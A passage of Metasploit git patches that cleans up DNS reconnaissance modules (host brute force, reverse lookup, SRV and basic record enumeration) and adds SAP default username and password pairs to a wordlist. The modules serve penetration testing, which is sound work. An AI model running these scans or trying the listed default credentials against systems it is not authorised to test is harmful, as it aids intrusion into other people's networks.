"namelist.txt")]), @@ -34,8 +34,8 @@ def initialize(info = {}) register_advanced_options( [ - OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received", 2]), - OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry", 2]), + OptInt.new('RETRY', [ false, "Number of tries to resolve a record if no response is received.", 2]), + OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 2]), OptInt.new('THREADS', [ false, "Number of threads", 1]), ], self.class) end @@ -55,9 +55,9 @@ def wildcard(target) rendsub = rand(10000).to_s query = @res.query("#{rendsub}.#{target}", "A") if query.answer.length != 0 - print_status("This Domain has Wildcards Enabled!!") + print_status("This Domain has wild-cards enabled!!") query.answer.each do |rr| - print_warning("Wildcard IP for #{rendsub}.#{target} is: #{rr.address.to_s}") if rr.class != Net::DNS::RR::CNAME + print_warning("Wild-card IP for #{rendsub}.#{target} is: #{rr.address.to_s}") if rr.class != Net::DNS::RR::CNAME end return true else @@ -101,7 +101,7 @@ def get_ip(host) #--------------------------------------------------------------------------------- def switchdns() - print_status("Using DNS Server: #{datastore['NS']}") + print_status("Using DNS server: #{datastore['NS']}") @res.nameserver=(datastore['NS']) @nsinuse = datastore['NS'] end From a7d4f5ff4ad184a003856cffacc7b968018a64e5 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 14 Feb 2013 15:46:36 -0400 Subject: [PATCH 388/421] Fix spelling problems --- modules/auxiliary/gather/dns_reverse_lookup.rb | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index cc102b92350a..28019c733206 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb @@ -14,9 +14,9 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Reverse Lookup', + 'Name' => 'DNS reverse lookup', 'Description' => %q{ - This module performs a Reverse Lookup against a given IP Range. + The module performs a reverse rookup against a given IP range. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], 'License' => BSD_LICENSE @@ -24,16 +24,16 @@ def initialize(info = {}) register_options( [ - OptAddressRange.new('RANGE', [true, 'IP Range to perform reverse lookup against.', nil]), - OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS" ]), + OptAddressRange.new('RANGE', [true, 'IP range to perform reverse lookup against.', nil]), + OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS." ]), ], self.class) register_advanced_options( [ - OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received", 2]), - OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry", 2]), - OptInt.new('THREADS', [ true, "Number of seconds to wait before doing a retry", 2]), + OptInt.new('RETRY', [ false, "Number of tries to resolve a record if no response is received.", 2]), + OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 2]), + OptInt.new('THREADS', [ true, "Number of seconds to wait before doing a retry.", 2]), ], self.class) end @@ -55,7 +55,7 @@ def run #------------------------------------------------------------------------------- def reverselkp(iprange) - print_status("Running Reverse Lookup against ip range #{iprange}") + print_status("Running reverse lookup against IP range #{iprange}") ar = Rex::Socket::RangeWalker.new(iprange) tl = [] while (true) @@ -93,7 +93,7 @@ def reverselkp(iprange) #--------------------------------------------------------------------------------- def switchdns() - print_status("Using DNS Server: #{datastore['NS']}") + print_status("Using DNS server: #{datastore['NS']}") @res.nameserver=(datastore['NS']) @nsinuse = datastore['NS'] end From 23320a5ddebd352937299b3b901886b6ee84966e Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 14 Feb 2013 15:48:11 -0400 Subject: [PATCH 389/421] Fix spelling problems --- modules/auxiliary/gather/dns_srv.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/dns_srv.rb b/modules/auxiliary/gather/dns_srv.rb index eac4bbe21429..b2eeb30287f7 100644 --- a/modules/auxiliary/gather/dns_srv.rb +++ b/modules/auxiliary/gather/dns_srv.rb @@ -14,9 +14,9 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Reverse Lookup', + 'Name' => 'DNS service record lookup', 'Description' => %q{ - The module enumerates common DNS Service Records. + The module enumerates common DNS service records. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], 'License' => BSD_LICENSE From 0b9d4d976fab6595cbf1381a8f3ef577a001944a Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 14 Feb 2013 21:44:31 -0400 Subject: [PATCH 390/421] more changes to description and name --- modules/auxiliary/gather/dns_srv.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/dns_srv.rb b/modules/auxiliary/gather/dns_srv.rb index b2eeb30287f7..a80e864b20f5 100644 --- a/modules/auxiliary/gather/dns_srv.rb +++ b/modules/auxiliary/gather/dns_srv.rb @@ -14,9 +14,9 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS service record lookup', + 'Name' => 'DNS Common Service Record Enumeration', 'Description' => %q{ - The module enumerates common DNS service records. + This module enumerates common DNS service records. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], 'License' => BSD_LICENSE From 1b8610042ad48b29098de6aa6ccfb73e8d46408b Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 14 Feb 2013 21:46:21 -0400 Subject: [PATCH 391/421] more changes to description and name --- modules/auxiliary/gather/dns_info.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/dns_info.rb b/modules/auxiliary/gather/dns_info.rb index fd11a82a7122..c036b2a95e2f 100644 --- a/modules/auxiliary/gather/dns_info.rb +++ b/modules/auxiliary/gather/dns_info.rb @@ -14,9 +14,9 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Base Information', + 'Name' => 'DNS Basic Information', 'Description' => %q{ - The module enumerates basic DNS information for a given domain. Information + This module enumerates basic DNS information for a given domain. Information enumerated is A, AAAA, NS and MX records for the given domain. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], From faf970cf1f4694483b0dabdcaaf7412ba97a9834 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 14 Feb 2013 21:47:43 -0400 Subject: [PATCH 392/421] more changes to description and name --- modules/auxiliary/gather/dns_bruteforce.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/dns_bruteforce.rb b/modules/auxiliary/gather/dns_bruteforce.rb index 99a5e3043458..2372c93bbc34 100644 --- a/modules/auxiliary/gather/dns_bruteforce.rb +++ b/modules/auxiliary/gather/dns_bruteforce.rb @@ -14,9 +14,9 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS host and subdomain brutefoce module', + 'Name' => 'DNS Host and Subdomain Brutefoce Module', 'Description' => %q{ - The module uses a dictionary to perform a bruteforce on hostnames and subdomains + This module uses a dictionary to perform a bruteforce on hostnames and subdomains available under a given domain. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], From 7f7b4e5a97cfcd280ce130bc0862d4be57d85e65 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 14 Feb 2013 21:49:57 -0400 Subject: [PATCH 393/421] more changes to description and name --- modules/auxiliary/gather/dns_reverse_lookup.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index 28019c733206..54de8d81bc83 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb @@ -14,9 +14,9 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS reverse lookup', + 'Name' => 'DNS Reverse Lookup Enumeration Module', 'Description' => %q{ - The module performs a reverse rookup against a given IP range. + This module performs a reverse rookup against a given IP range. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], 'License' => BSD_LICENSE From 1d64de6c11c31f5d17db6e73d95804cc7ed94f53 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 14 Feb 2013 21:55:38 -0400 Subject: [PATCH 394/421] Typo word module does not go in the name. --- modules/auxiliary/gather/dns_reverse_lookup.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index 54de8d81bc83..20826e56d81e 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb @@ -14,7 +14,7 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Reverse Lookup Enumeration Module', + 'Name' => 'DNS Reverse Lookup Enumeration', 'Description' => %q{ This module performs a reverse rookup against a given IP range. }, From bcd59aa8faae0d8d644a7410dc6da0a2197e8797 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 14 Feb 2013 21:56:24 -0400 Subject: [PATCH 395/421] Typo word module does not go in the name. --- modules/auxiliary/gather/dns_bruteforce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/dns_bruteforce.rb b/modules/auxiliary/gather/dns_bruteforce.rb index 2372c93bbc34..c41403f7e971 100644 --- a/modules/auxiliary/gather/dns_bruteforce.rb +++ b/modules/auxiliary/gather/dns_bruteforce.rb @@ -14,7 +14,7 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Host and Subdomain Brutefoce Module', + 'Name' => 'DNS Host and Subdomain Brutefoce', 'Description' => %q{ This module uses a dictionary to perform a bruteforce on hostnames and subdomains available under a given domain. From 57e1d1baa5b3e4fe047ab5bd0c06067b400080c4 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 15 Feb 2013 12:03:08 +0100 Subject: [PATCH 396/421] cleanup for dns_info --- modules/auxiliary/gather/dns_info.rb | 145 +++++++++++++-------------- 1 file changed, 70 insertions(+), 75 deletions(-) diff --git a/modules/auxiliary/gather/dns_info.rb b/modules/auxiliary/gather/dns_info.rb index c036b2a95e2f..21c84de8ae98 100644 --- a/modules/auxiliary/gather/dns_info.rb +++ b/modules/auxiliary/gather/dns_info.rb @@ -14,14 +14,16 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Basic Information', - 'Description' => %q{ - This module enumerates basic DNS information for a given domain. Information - enumerated is A, AAAA, NS and MX records for the given domain. + 'Name' => 'DNS Basic Information Enumeration', + 'Description' => %q{ + This module enumerates basic DNS information for a given domain. The module + gets information regarding to A (addresses), AAAA (IPv6 addresses), NS (name + servers), SOA (start of authority) and MX (mail servers) records for a given + domain. In addition, this module retrieves information stored in TXT records. }, - 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], - 'License' => BSD_LICENSE - )) + 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], + 'License' => BSD_LICENSE + )) register_options( [ @@ -50,15 +52,15 @@ def run end wildcard(datastore['DOMAIN']) - switchdns() if not datastore['NS'].nil? + switchdns() unless datastore['NS'].nil? or datastore['NS'].empty? get_ip(datastore['DOMAIN']).each do |r| - print_good("#{r[:host]} #{r[:address]} #{r[:type]}") + print_good("#{r[:host]} - Address #{r[:address]} found. Record type: #{r[:type]}") report_host(:host => r[:address]) end get_ns(datastore['DOMAIN']).each do |r| - print_good("#{r[:host]} #{r[:address]} #{r[:type]}") + print_good("#{datastore['DOMAIN']} - Name server #{r[:host]} (#{r[:address]}) found. Record type: #{r[:type]}") report_host(:host => r[:address], :name => r[:host]) report_service( :host => r[:address], @@ -69,12 +71,12 @@ def run end get_soa(datastore['DOMAIN']).each do |r| - print_good("#{r[:host]} #{r[:address]} #{r[:type]}") + print_good("#{datastore['DOMAIN']} - #{r[:host]} (#{r[:address]}) found. Record type: #{r[:type]}") report_host(:host => r[:address], :name => r[:host]) end get_mx(datastore['DOMAIN']).each do |r| - print_good("#{r[:host]} #{r[:address]} #{r[:type]}") + print_good("#{datastore['DOMAIN']} - Mail server #{r[:host]} (#{r[:address]}) found. Record type: #{r[:type]}") report_host(:host => r[:address], :name => r[:host]) report_service( :host => r[:address], @@ -85,15 +87,17 @@ def run end get_txt(datastore['DOMAIN']).each do |r| - report_note(:host => datastore['DOMAIN'], - :proto => 'UDP', - :port => 53, - :type => 'dns.info', - :data => {:text => r[:text]}) + print_good("#{datastore['DOMAIN']} - Text info found: #{r[:text]}. Record type: #{r[:type]}") + report_note( + :host => datastore['DOMAIN'], + :proto => 'udp', + :port => 53, + :type => 'dns.info', + :data => {:text => r[:text]} + ) end end - #--------------------------------------------------------------------------------- def wildcard(target) rendsub = rand(10000).to_s query = @res.query("#{rendsub}.#{target}", "A") @@ -101,11 +105,13 @@ def wildcard(target) print_status("This Domain has Wild-cards Enabled!!") query.answer.each do |rr| print_status("Wild-card IP for #{rendsub}.#{target} is: #{rr.address.to_s}") if rr.class != Net::DNS::RR::CNAME - report_note(:host => datastore['DOMAIN'], - :proto => 'UDP', - :port => 53, - :type => 'dns.wildcard', - :data => "Wildcard IP for #{rendsub}.#{target} is: #{rr.address.to_s}") + report_note( + :host => datastore['DOMAIN'], + :proto => 'UDP', + :port => 53, + :type => 'dns.wildcard', + :data => "Wildcard IP for #{rendsub}.#{target} is: #{rr.address.to_s}" + ) end return true else @@ -113,11 +119,10 @@ def wildcard(target) end end - #--------------------------------------------------------------------------------- def get_ip(host) results = [] query = @res.search(host, "A") - if (query) + if query query.answer.each do |rr| record = {} record[:host] = host @@ -127,7 +132,7 @@ def get_ip(host) end end query1 = @res.search(host, "AAAA") - if (query1) + if query1 query1.answer.each do |rr| record = {} record[:host] = host @@ -139,94 +144,84 @@ def get_ip(host) return results end - #--------------------------------------------------------------------------------- def get_ns(target) results = [] query = @res.query(target, "NS") - if (query) - (query.answer.select { |i| i.class == Net::DNS::RR::NS}).each do |rr| - get_ip(rr.nsdname).each do |r| - record = {} - record[:host] = rr.nsdname.gsub(/\.$/,'') - record[:type] = "NS" - record[:address] = r[:address].to_s - results << record - end + return results if not query + (query.answer.select { |i| i.class == Net::DNS::RR::NS}).each do |rr| + get_ip(rr.nsdname).each do |r| + record = {} + record[:host] = rr.nsdname.gsub(/\.$/,'') + record[:type] = "NS" + record[:address] = r[:address].to_s + results << record end end return results end - #--------------------------------------------------------------------------------- def get_soa(target) results = [] query = @res.query(target, "SOA") - if (query) - (query.answer.select { |i| i.class == Net::DNS::RR::SOA}).each do |rr| - if Rex::Socket.dotted_ip?(rr.mname) + return results if not query + (query.answer.select { |i| i.class == Net::DNS::RR::SOA}).each do |rr| + if Rex::Socket.dotted_ip?(rr.mname) + record = {} + record[:host] = rr.mname + record[:type] = "SOA" + record[:address] = rr.mname + results << record + else + get_ip(rr.mname).each do |ip| record = {} - record[:host] = rr.mname + record[:host] = rr.mname.gsub(/\.$/,'') record[:type] = "SOA" - record[:address] = rr.mname + record[:address] = ip[:address].to_s results << record - else - get_ip(rr.mname).each do |ip| - record = {} - record[:host] = rr.mname.gsub(/\.$/,'') - record[:type] = "SOA" - record[:address] = ip[:address].to_s - results << record - end end end end return results end - #--------------------------------------------------------------------------------- def get_txt(target) results = [] query = @res.query(target, "TXT") - if (query) - query.answer.each do |rr| - record = {} - print_good("Text: #{rr.txt}, TXT") - record[:host] = target - record[:text] = rr.txt - record[:type] = "TXT" - results << record - end + return results if not query + query.answer.each do |rr| + record = {} + record[:host] = target + record[:text] = rr.txt + record[:type] = "TXT" + results << record end return results end - #--------------------------------------------------------------------------------- def get_mx(target) results = [] query = @res.query(target, "MX") - if (query) - (query.answer.select { |i| i.class == Net::DNS::RR::MX}).each do |rr| - if Rex::Socket.dotted_ip?(rr.exchange) + return results if not query + (query.answer.select { |i| i.class == Net::DNS::RR::MX}).each do |rr| + if Rex::Socket.dotted_ip?(rr.exchange) + record = {} + record[:host] = rr.exchange + record[:type] = "MX" + record[:address] = rr.exchange + results << record + else + get_ip(rr.exchange).each do |ip| record = {} - record[:host] = rr.exchange + record[:host] = rr.exchange.gsub(/\.$/,'') record[:type] = "MX" - record[:address] = rr.exchange + record[:address] = ip[:address].to_s results << record - else - get_ip(rr.exchange).each do |ip| - record = {} - record[:host] = rr.exchange.gsub(/\.$/,'') - record[:type] = "MX" - record[:address] = ip[:address].to_s - results << record - end end end end return results end - #--------------------------------------------------------------------------------- def switchdns() print_status("Using DNS server: #{datastore['NS']}") @res.nameserver=(datastore['NS']) From 6aed858f8063ba45172b74c34b7dadd8bb1993a1 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 15 Feb 2013 12:37:46 +0100 Subject: [PATCH 397/421] cleanup for dns_bruteforce --- modules/auxiliary/gather/dns_bruteforce.rb | 26 +++++++++------------- 1 file changed, 11 insertions(+), 15 deletions(-) diff --git a/modules/auxiliary/gather/dns_bruteforce.rb b/modules/auxiliary/gather/dns_bruteforce.rb index c41403f7e971..74ca1672ecdc 100644 --- a/modules/auxiliary/gather/dns_bruteforce.rb +++ b/modules/auxiliary/gather/dns_bruteforce.rb @@ -14,43 +14,41 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Host and Subdomain Brutefoce', + 'Name' => 'DNS Brutefoce Enumeration', 'Description' => %q{ - This module uses a dictionary to perform a bruteforce on hostnames and subdomains - available under a given domain. + This module uses a dictionary to perform a bruteforce attack to enumerate + hostnames and subdomains available under a given domain. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], 'License' => BSD_LICENSE - )) + )) register_options( [ OptString.new('DOMAIN', [ true, "The target domain name"]), OptAddress.new('NS', [ false, "Specify the name server to use for queries, otherwise use the system DNS" ]), - OptPath.new('WORDLIST', [ false, "Wordlist file for domain name brute force.", - File.join(Msf::Config.install_root, "data", "wordlists", "namelist.txt")]), - + OptPath.new('WORDLIST', [ true, "Wordlist file for domain name brute force.", + File.join(Msf::Config.install_root, "data", "wordlists", "namelist.txt")]) ], self.class) register_advanced_options( [ OptInt.new('RETRY', [ false, "Number of tries to resolve a record if no response is received.", 2]), OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 2]), - OptInt.new('THREADS', [ false, "Number of threads", 1]), + OptInt.new('THREADS', [ true, "Number of threads", 1]) ], self.class) end def run print_status("Enumerating #{datastore['DOMAIN']}") @res = Net::DNS::Resolver.new() - @res.retry = datastore['RETRY'].to_i - @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + @res.retry = datastore['RETRY'].to_i unless datastore['RETRY'].nil? + @res.retry_interval = datastore['RETRY_INTERVAL'].to_i unless datastore['RETRY_INTERVAL'].nil? wildcard(datastore['DOMAIN']) - switchdns() if not datastore['NS'].nil? + switchdns() unless datastore['NS'].nil? dnsbrt(datastore['DOMAIN']) end - #--------------------------------------------------------------------------------- def wildcard(target) rendsub = rand(10000).to_s query = @res.query("#{rendsub}.#{target}", "A") @@ -65,7 +63,6 @@ def wildcard(target) end end - #--------------------------------------------------------------------------------- def get_ip(host) results = [] query = @res.search(host, "A") @@ -99,7 +96,6 @@ def get_ip(host) return results end - #--------------------------------------------------------------------------------- def switchdns() print_status("Using DNS server: #{datastore['NS']}") @res.nameserver=(datastore['NS']) @@ -119,7 +115,7 @@ def dnsbrt(domain) Thread.current.kill if not testf vprint_status("Testing #{testf}.#{domain}") get_ip("#{testf}.#{domain}").each do |i| - print_good("#{i[:host]} #{i[:address]}") + print_good("Host #{i[:host]} with address #{i[:address]} found") report_host( :host => i[:address].to_s, :name => i[:host].gsub(/\.$/,'') From 38f5fbced32dba8238a1a84b04fee141403863db Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 15 Feb 2013 12:56:01 +0100 Subject: [PATCH 398/421] cleanup for dns_reverse_lookup --- .../auxiliary/gather/dns_reverse_lookup.rb | 23 ++++++++----------- 1 file changed, 10 insertions(+), 13 deletions(-) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index 20826e56d81e..80ae0a844f9c 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb @@ -16,24 +16,24 @@ def initialize(info = {}) super(update_info(info, 'Name' => 'DNS Reverse Lookup Enumeration', 'Description' => %q{ - This module performs a reverse rookup against a given IP range. + This module performs DNS reverse lookup against a given IP range in order to + retrieve valid addresses and names. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], 'License' => BSD_LICENSE - )) + )) register_options( [ - OptAddressRange.new('RANGE', [true, 'IP range to perform reverse lookup against.', nil]), - OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS." ]), - + OptAddressRange.new('RANGE', [true, 'IP range to perform reverse lookup against.']), + OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS." ]) ], self.class) register_advanced_options( [ OptInt.new('RETRY', [ false, "Number of tries to resolve a record if no response is received.", 2]), OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 2]), - OptInt.new('THREADS', [ true, "Number of seconds to wait before doing a retry.", 2]), + OptInt.new('THREADS', [ true, "The number of concurrent threads.", 1]) ], self.class) end @@ -49,11 +49,10 @@ def run end @threadnum = datastore['THREADS'].to_i - switchdns() if not datastore['NS'].nil? + switchdns() unless datastore['NS'].nil? reverselkp(datastore['RANGE']) end - #------------------------------------------------------------------------------- def reverselkp(iprange) print_status("Running reverse lookup against IP range #{iprange}") ar = Rex::Socket::RangeWalker.new(iprange) @@ -67,11 +66,10 @@ def reverselkp(iprange) begin query = @res.query(tip) query.each_ptr do |addresstp| - print_status("Host Name: #{addresstp} IP Address: #{tip.to_s}") - + print_status("Host Name: #{addresstp}, IP Address: #{tip.to_s}") report_host( - :host => tip.to_s, - :name => addresstp + :host => tip.to_s, + :name => addresstp ) end rescue ::Interrupt @@ -91,7 +89,6 @@ def reverselkp(iprange) end end - #--------------------------------------------------------------------------------- def switchdns() print_status("Using DNS server: #{datastore['NS']}") @res.nameserver=(datastore['NS']) From 65194441122d858f02c52d896fc933a3ab1cbdae Mon Sep 17 00:00:00 2001 From: Chris John Riley <reg@c22.cc> Date: Fri, 15 Feb 2013 13:35:25 +0100 Subject: [PATCH 399/421] Addition defaults --- data/wordlists/sap_default.txt | 3 +++ 1 file changed, 3 insertions(+) diff --git a/data/wordlists/sap_default.txt b/data/wordlists/sap_default.txt index dcd73dd49cdf..2102fd069bf3 100644 --- a/data/wordlists/sap_default.txt +++ b/data/wordlists/sap_default.txt @@ -12,3 +12,6 @@ ADS_AGENT ch4ngeme DEVELOPER ch4ngeme J2EE_ADMIN ch4ngeme SAPJSF ch4ngeme +SAPR3 SAP +CTB_ADMIN sap123 +XMI_DEMO sap123 \ No newline at end of file From 374faf9b0282c03312711af28b3a760d0154bf25 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 15 Feb 2013 16:19:48 +0100 Subject: [PATCH 400/421] cleanup for dns_srv --- modules/auxiliary/gather/dns_srv.rb | 110 ++++++++++++++-------------- 1 file changed, 55 insertions(+), 55 deletions(-) diff --git a/modules/auxiliary/gather/dns_srv.rb b/modules/auxiliary/gather/dns_srv.rb index a80e864b20f5..aeb3eef1c5c1 100644 --- a/modules/auxiliary/gather/dns_srv.rb +++ b/modules/auxiliary/gather/dns_srv.rb @@ -16,7 +16,12 @@ def initialize(info = {}) super(update_info(info, 'Name' => 'DNS Common Service Record Enumeration', 'Description' => %q{ - This module enumerates common DNS service records. + This module enumerates common DNS service records in a given domain. By setting + the ALL_DNS to true, all the name servers of a given domain are used for + enumeration. Otherwise only the system dns is used for enumration. in order to get + all the available name servers for the given domain the SOA and NS records are + queried. In order to convert from domain names to IP addresses queries for A and + AAAA (IPv6) records are used. }, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], 'License' => BSD_LICENSE @@ -25,13 +30,13 @@ def initialize(info = {}) register_options( [ OptString.new('DOMAIN', [ true, "The target domain name."]), - OptBool.new( 'ALL_NS', [ false, "Run against all name servers for the given domain.",false]), + OptBool.new( 'ALL_NS', [ false, "Run against all name servers for the given domain.",false]) ], self.class) register_advanced_options( [ - OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received.", 3]), - OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 4]), + OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received.", 2]), + OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 2]) ], self.class) end @@ -61,6 +66,10 @@ def run records.uniq! records.each do |r| print_good("Host: #{r[:host]} IP: #{r[:address].to_s} Service: #{r[:service]} Protocol: #{r[:proto]} Port: #{r[:port]}") + report_host( + :host => r[:address].to_s, + :name => r[:host] + ) report_service( :host=> r[:address].to_s, :port => r[:port].to_i, @@ -68,39 +77,34 @@ def run :name => r[:service], :host_name => r[:host] ) - report_host( - :host => r[:address].to_s, - :name => r[:host] - ) end end - #--------------------------------------------------------------------------------- + def get_soa(target) results = [] query = @res.query(target, "SOA") - if (query) - (query.answer.select { |i| i.class == Net::DNS::RR::SOA}).each do |rr| - if Rex::Socket.dotted_ip?(rr.mname) + return results if not query + (query.answer.select { |i| i.class == Net::DNS::RR::SOA}).each do |rr| + if Rex::Socket.dotted_ip?(rr.mname) + record = {} + record[:host] = rr.mname + record[:type] = "SOA" + record[:address] = rr.mname + results << record + else + get_ip(rr.mname).each do |ip| record = {} - record[:host] = rr.mname + record[:host] = rr.mname.gsub(/\.$/,'') record[:type] = "SOA" - record[:address] = rr.mname + record[:address] = ip[:address].to_s results << record - else - get_ip(rr.mname).each do |ip| - record = {} - record[:host] = rr.mname.gsub(/\.$/,'') - record[:type] = "SOA" - record[:address] = ip[:address].to_s - results << record - end end end end return results end - #------------------------------------------------------------------------------- + def srvqry(dom) results = [] #Most common SRV Records @@ -127,36 +131,35 @@ def srvqry(dom) begin query = @res.query(trg , Net::DNS::SRV) - if query - query.answer.each do |srv| - if Rex::Socket.dotted_ip?(srv.host) + next unless query + query.answer.each do |srv| + if Rex::Socket.dotted_ip?(srv.host) + record = {} + srv_info = srvt.scan(/^_(\S*)\._(tcp|udp)\./)[0] + record[:host] = srv.host.gsub(/\.$/,'') + record[:type] = "SRV" + record[:address] = srv.host + record[:srv] = srvt + record[:service] = srv_info[0] + record[:proto] = srv_info[1] + record[:port] = srv.port + record[:priority] = srv.priority + results << record + vprint_status("SRV Record: #{trg} Host: #{srv.host.gsub(/\.$/,'')} IP: #{srv.host} Port: #{srv.port} Priority: #{srv.priority}") + else + get_ip(srv.host.gsub(/\.$/,'')).each do |ip| record = {} srv_info = srvt.scan(/^_(\S*)\._(tcp|udp)\./)[0] record[:host] = srv.host.gsub(/\.$/,'') record[:type] = "SRV" - record[:address] = srv.host + record[:address] = ip[:address] record[:srv] = srvt record[:service] = srv_info[0] record[:proto] = srv_info[1] record[:port] = srv.port record[:priority] = srv.priority results << record - vprint_status("SRV Record: #{trg} Host: #{srv.host.gsub(/\.$/,'')} IP: #{srv.host} Port: #{srv.port} Priority: #{srv.priority}") - else - get_ip(srv.host.gsub(/\.$/,'')).each do |ip| - record = {} - srv_info = srvt.scan(/^_(\S*)\._(tcp|udp)\./)[0] - record[:host] = srv.host.gsub(/\.$/,'') - record[:type] = "SRV" - record[:address] = ip[:address] - record[:srv] = srvt - record[:service] = srv_info[0] - record[:proto] = srv_info[1] - record[:port] = srv.port - record[:priority] = srv.priority - results << record - vprint_status("SRV Record: #{trg} Host: #{srv.host} IP: #{ip[:address]} Port: #{srv.port} Priority: #{srv.priority}") - end + vprint_status("SRV Record: #{trg} Host: #{srv.host} IP: #{ip[:address]} Port: #{srv.port} Priority: #{srv.priority}") end end end @@ -166,7 +169,6 @@ def srvqry(dom) return results end - #--------------------------------------------------------------------------------- def get_ip(host) results = [] query = @res.search(host, "A") @@ -199,26 +201,24 @@ def get_ip(host) end return results end - #--------------------------------------------------------------------------------- + def switchdns(ns) vprint_status("Enumerating SRV Records on: #{ns}") @res.nameserver=(ns) @nsinuse = ns end - #--------------------------------------------------------------------------------- def get_ns(target) results = [] query = @res.query(target, "NS") - if (query) - (query.answer.select { |i| i.class == Net::DNS::RR::NS}).each do |rr| - get_ip(rr.nsdname).each do |r| - record = {} - record[:host] = rr.nsdname.gsub(/\.$/,'') - record[:type] = "NS" - record[:address] = r[:address].to_s - results << record - end + return results if not query + (query.answer.select { |i| i.class == Net::DNS::RR::NS}).each do |rr| + get_ip(rr.nsdname).each do |r| + record = {} + record[:host] = 